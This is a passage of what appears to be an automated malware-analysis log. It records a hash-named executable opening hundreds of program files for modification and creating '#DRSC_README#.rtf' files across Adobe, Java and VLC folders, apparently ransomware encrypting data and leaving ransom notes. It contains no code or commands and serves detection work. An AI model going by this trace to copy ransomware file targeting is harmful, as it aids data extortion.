(x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\logo_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\hr-hr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pl-pl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\orbd.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jarsigner.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.intro_3.4.200.v20130326-1254.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\cryptocme.sig 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\charsets.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\larrow.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sl-sl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ca-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Cloud Services.pdf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\rhp_world_icon_hover_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-ae\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\pt_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\ktab.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_70.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\tl.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\back-arrow-focus.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\cstm_brand_preview2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ca-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\cmm\LINEAR_RGB.pf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\virgo-new-folder.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\am.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\s_agreement_filetype.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jetty.io_8.1.14.v20131031.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-heapwalker.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hr-hr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\tr-tr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pl-pl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\tnameserv.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-services.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\s_agreement_filetype.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\rename.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ko-kr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\line_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\hr-hr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\images\themeless\mobile_scan_logo.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-variant2-2x.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\s_opencarat_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt_1.1.1.v20140903-0821.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jstat.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_ellipses.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugins\rhp\createpdfupsell-app-selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-ae\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\el_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\protect_poster.jpg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libbluray-j2se-1.0.2.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\SearchEmail2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_export_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\dd_arrow_small.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\selection-actions2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-settings_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\pl-pl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\03_lastfm.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\text_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicTSFrame.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_fr_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\fillandsign.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.common_3.6.200.v20130402-1505.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\organize.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\cpdf\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\hijrah-config-umalqura.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_hover_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\editpdf-selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\adc_logo.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ca-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ro-ro\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\uk-ua\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-en_us_2x.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mac.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Viewer.aapp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\FillnSign_visual.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\ZY______.PFB 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\appletviewer.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\Toast.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_highcontrast_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\email_all.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets_1.0.0.v20140514-1823.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\management\management.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-explorer.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\AddressBook.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\CompressSelect.avi 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sk-sk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader 